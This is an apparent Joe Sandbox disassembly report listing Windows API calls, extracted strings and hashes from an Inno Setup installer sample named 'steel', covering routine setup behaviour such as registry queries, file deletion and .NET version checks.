                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                            • API String ID: 2000705611-3672972446
                                                                                            • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                            • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                            • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                              • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                            • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                            APIs
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                            • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                            • GetDC.USER32(00000000), ref: 0041B402
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                            • String ID:
                                                                                            • API String ID: 644427674-0
                                                                                            • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                            • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                            • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                            • RegOpenKeyEx, xrefs: 00454910
                                                                                            • , xrefs: 004548FE
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                            • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                            APIs
                                                                                              • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                            Strings
                                                                                            • v1.1.4322, xrefs: 004595C2
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                            • v2.0.50727, xrefs: 0045955B
                                                                                            • .NET Framework not found, xrefs: 0045961D
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                            • v4.0.30319, xrefs: 004594F1
                                                                                            • .NET Framework version %s not found, xrefs: 00459609
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                            • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                            Strings
                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                            • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Strings
                                                                                            • , xrefs: 004545B1
                                                                                            • RegCreateKeyEx, xrefs: 004545C3
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                            • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                              • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                            • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                              • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 1549857992-2312673372
                                                                                            • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                            • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                            • API String ID: 4190037839-2312295185
                                                                                            • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                            • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 004629FC
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                            • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F194
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                            Strings
